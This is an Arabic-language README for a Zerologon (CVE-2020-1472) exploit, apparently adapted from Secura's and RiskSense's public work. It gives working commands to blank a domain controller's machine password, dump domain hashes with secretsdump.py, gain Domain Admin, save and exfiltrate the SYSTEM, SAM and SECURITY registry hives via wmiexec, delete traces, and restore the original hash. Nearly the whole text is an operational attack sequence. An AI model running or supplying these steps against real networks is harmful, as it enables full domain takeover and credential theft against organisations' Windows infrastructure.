
استغلال لـ Zerologon cve-2020-1472
كود الاستغلال مبني على https://www.secura.com/blog/zero-logon و https://github.com/SecuraBV/CVE-2020-1472. البحث والماسح الأصلي من Secura، تعديلات من RiskSense Inc.
لاستغلال الثغرة، قم بإزالة أي تثبيتات سابقة لـ Impacket وقم بتثبيت Impacket من https://github.com/SecureAuthCorp/impacket/commit/b867b21 أو أحدث. ثم قم بالتالي:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
إذا نجح ذلك، ستتمكن بعد ذلك من:
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'
وهذا يجب أن يمنحك صلاحيات Domain Admin. بعد الحصول على ذلك، استخدم wmiexec.py على الـ DC المستهدف باستخدام بيانات اعتماد من secretsdump وقم بالتالي:
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
ثم يمكنك
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
وهذا يجب أن يُظهر لك تجزئة NT الأصلية لحساب الجهاز. يمكنك بعد ذلك إعادة تثبيت تجزئة حساب الجهاز الأصلية إلى المجال باستخدام
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
إعادة تثبيت التجزئة الأصلية ضرورية لكي يستمر الـ DC في العمل بشكل طبيعي.